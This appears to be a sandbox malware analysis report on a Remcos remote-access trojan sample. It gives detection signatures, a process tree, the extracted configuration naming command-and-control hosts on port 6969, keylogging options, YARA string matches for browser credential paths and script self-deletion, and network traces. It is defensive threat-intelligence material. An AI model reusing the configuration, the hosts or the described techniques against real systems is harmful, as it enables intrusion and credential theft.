Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report V8IB839cvz.exe

Overview

General Information

Sample Name:V8IB839cvz.exe
Analysis ID:429553
MD5:10d42f55d89b6fd42404e470e68f1996
SHA1:3b9787bbfaae456fe082db8e2e61c70c5fb45328
SHA256:b84a345efddfa5a852c3e3c5c2c97dab1a6f4643906d80c0c8cafa1e25247326
Tags:exeRATRemcosRAT
Infos:

Most interesting Screenshot:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • V8IB839cvz.exe (PID: 7136 cmdline: 'C:\Users\user\Desktop\V8IB839cvz.exe' MD5: 10D42F55D89B6FD42404E470E68F1996)
    • V8IB839cvz.exe (PID: 6584 cmdline: C:\Users\user\Desktop\V8IB839cvz.exe MD5: 10D42F55D89B6FD42404E470E68F1996)
    • cmd.exe (PID: 2228 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6540 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Xypgtv.exe (PID: 6740 cmdline: 'C:\Users\Public\Xypgtv\Xypgtv.exe' MD5: 10D42F55D89B6FD42404E470E68F1996)
    • Xypgtv.exe (PID: 6480 cmdline: C:\Users\Public\Xypgtv\Xypgtv.exe MD5: 10D42F55D89B6FD42404E470E68F1996)
  • Xypgtv.exe (PID: 7004 cmdline: 'C:\Users\Public\Xypgtv\Xypgtv.exe' MD5: 10D42F55D89B6FD42404E470E68F1996)
    • Xypgtv.exe (PID: 6324 cmdline: C:\Users\Public\Xypgtv\Xypgtv.exe MD5: 10D42F55D89B6FD42404E470E68F1996)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "nothinglike.ac.ug:6969:0brudfascaqezd.ac.ug:6969:0", "Assigned name": "vvvvvvvvvv", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "daxvxdsaxzcas-LAPFBZ", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "10000"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\vtgpyX.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000003.729900326.0000000002410000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
      • 0x9b4:$file: URL=
      • 0x998:$url_explicit: [InternetShortcut]
      00000009.00000003.731801392.0000000002444000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
      • 0xc28:$file: URL=
      • 0xc0c:$url_explicit: [InternetShortcut]
      00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        Click to see the 26 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.V8IB839cvz.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          2.2.V8IB839cvz.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
          • 0x5487c:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x54d88:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x54788:$str_b2: Executing file:
          • 0x5a06c:$str_b3: GetDirectListeningPort
          • 0x54b78:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x54ecc:$str_b5: licence_code.txt
          • 0x54cf8:$str_b7: \update.vbs
          • 0x547f8:$str_b9: Downloaded file:
          • 0x547c4:$str_b10: Downloading file:
          • 0x547ac:$str_b12: Failed to upload file:
          • 0x5a040:$str_b13: StartForward
          • 0x5a060:$str_b14: StopForward
          • 0x54c50:$str_b15: fso.DeleteFile "
          • 0x54be4:$str_b16: On Error Resume Next
          • 0x54c80:$str_b17: fso.DeleteFolder "
          • 0x5479c:$str_b18: Uploaded file:
          • 0x54838:$str_b19: Unable to delete:
          • 0x54c18:$str_b20: while fso.FileExists("
          • 0x549b5:$str_c0: [Firefox StoredLogins not found]
          • 0x548e9:$str_c2: [Chrome StoredLogins found, cleared!]
          • 0x548c5:$str_c3: [Chrome StoredLogins not found]
          17.2.Xypgtv.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            17.2.Xypgtv.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
            • 0x5487c:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
            • 0x54d88:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
            • 0x54788:$str_b2: Executing file:
            • 0x5a06c:$str_b3: GetDirectListeningPort
            • 0x54b78:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
            • 0x54ecc:$str_b5: licence_code.txt
            • 0x54cf8:$str_b7: \update.vbs
            • 0x547f8:$str_b9: Downloaded file:
            • 0x547c4:$str_b10: Downloading file:
            • 0x547ac:$str_b12: Failed to upload file:
            • 0x5a040:$str_b13: StartForward
            • 0x5a060:$str_b14: StopForward
            • 0x54c50:$str_b15: fso.DeleteFile "
            • 0x54be4:$str_b16: On Error Resume Next
            • 0x54c80:$str_b17: fso.DeleteFolder "
            • 0x5479c:$str_b18: Uploaded file:
            • 0x54838:$str_b19: Unable to delete:
            • 0x54c18:$str_b20: while fso.FileExists("
            • 0x549b5:$str_c0: [Firefox StoredLogins not found]
            • 0x548e9:$str_c2: [Chrome StoredLogins found, cleared!]
            • 0x548c5:$str_c3: [Chrome StoredLogins not found]
            15.2.Xypgtv.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 1 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Execution from Suspicious FolderShow sources
              Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\Public\Xypgtv\Xypgtv.exe, CommandLine: C:\Users\Public\Xypgtv\Xypgtv.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Xypgtv\Xypgtv.exe, NewProcessName: C:\Users\Public\Xypgtv\Xypgtv.exe, OriginalFileName: C:\Users\Public\Xypgtv\Xypgtv.exe, ParentCommandLine: 'C:\Users\Public\Xypgtv\Xypgtv.exe' , ParentImage: C:\Users\Public\Xypgtv\Xypgtv.exe, ParentProcessId: 6740, ProcessCommandLine: C:\Users\Public\Xypgtv\Xypgtv.exe, ProcessId: 6480

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 17.2.Xypgtv.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": "nothinglike.ac.ug:6969:0brudfascaqezd.ac.ug:6969:0", "Assigned name": "vvvvvvvvvv", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "daxvxdsaxzcas-LAPFBZ", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "wikipedia;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "10000"}
              Multi AV Scanner detection for dropped fileShow sources
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeReversingLabs: Detection: 41%
              Multi AV Scanner detection for submitted fileShow sources
              Source: V8IB839cvz.exeReversingLabs: Detection: 41%
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6324, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6480, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: V8IB839cvz.exe PID: 6584, type: MEMORY
              Source: Yara matchFile source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Machine Learning detection for dropped fileShow sources
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeJoe Sandbox ML: detected
              Machine Learning detection for sampleShow sources
              Source: V8IB839cvz.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00427D99 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,2_2_00427D99
              Source: V8IB839cvz.exe, 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----

              Compliance:

              barindex
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\user\Desktop\V8IB839cvz.exeUnpacked PE file: 2.2.V8IB839cvz.exe.400000.0.unpack
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeUnpacked PE file: 15.2.Xypgtv.exe.400000.0.unpack
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeUnpacked PE file: 17.2.Xypgtv.exe.400000.0.unpack
              Source: V8IB839cvz.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49759 version: TLS 1.2
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004041E6 FindFirstFileW,FindNextFileW,2_2_004041E6
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0043C2E9 FindFirstFileExA,2_2_0043C2E9
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00406317 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00406317
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041146E FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,2_2_0041146E
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004074C9 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_004074C9
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004076E4 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_004076E4
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00406776 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00406776
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004049A0 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,2_2_004049A0

              Networking:

              barindex
              C2 URLs / IPs found in malware configurationShow sources
              Source: Malware configuration extractorURLs: nothinglike.ac.ug
              Source: global trafficTCP traffic: 192.168.2.4:49745 -> 79.134.225.25:6969
              Source: Joe Sandbox ViewIP Address: 79.134.225.25 79.134.225.25
              Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
              Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
              Source: Joe Sandbox ViewASN Name: FINK-TELECOM-SERVICESCH FINK-TELECOM-SERVICESCH
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040D14F SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,Sleep,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,2_2_0040D14F
              Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49729 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.4:49759 version: TLS 1.2
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040D14F SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,Sleep,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,2_2_0040D14F
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040D14F SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,Sleep,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,2_2_0040D14F

              E-Banking Fraud:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6324, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6480, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: V8IB839cvz.exe PID: 6584, type: MEMORY
              Source: Yara matchFile source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE

              System Summary:

              barindex
              Malicious sample detected (through community Yara rule)Show sources
              Source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040D14F SetEvent,GetTickCount,DeleteFileW,ExitProcess,Sleep,Sleep,URLDownloadToFileW,Sleep,MessageBoxW,ExitWindowsEx,LoadLibraryA,GetProcAddress,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,OpenClipboard,EmptyClipboard,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SetWindowTextW,StrToIntA,CreateThread,ShowWindow,SetForegroundWindow,2_2_0040D14F
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040C00C2_2_0040C00C
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041C0862_2_0041C086
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042E10C2_2_0042E10C
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004431162_2_00443116
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041426F2_2_0041426F
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042A35E2_2_0042A35E
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004413272_2_00441327
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042D48A2_2_0042D48A
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041C7242_2_0041C724
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041C8672_2_0041C867
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042D8A22_2_0042D8A2
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00441A392_2_00441A39
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00447B402_2_00447B40
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041BB8F2_2_0041BB8F
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042DCD72_2_0042DCD7
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042FCE92_2_0042FCE9
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00412CF02_2_00412CF0
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042AE102_2_0042AE10
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00427EA42_2_00427EA4
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042FF182_2_0042FF18
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00436FF02_2_00436FF0
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042CF8E2_2_0042CF8E
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: String function: 00429310 appears 50 times
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: String function: 0040207E appears 51 times
              Source: V8IB839cvz.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: Xypgtv.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
              Source: V8IB839cvz.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
              Source: 00000009.00000003.729900326.0000000002410000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.731801392.0000000002444000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.749959961.0000000002820000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.730552799.0000000002444000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.731106098.0000000002444000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.731257935.0000000002444000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.749327450.000000000284C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.750252073.0000000002854000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.729493553.0000000002428000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.728627251.000000000243C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.751417519.0000000002854000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.750787460.0000000002854000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.749703567.0000000002838000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.751016095.0000000002854000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 00000009.00000003.731519002.0000000002444000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 0000000B.00000003.750523839.0000000002854000.00000004.00000001.sdmp, type: MEMORYMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
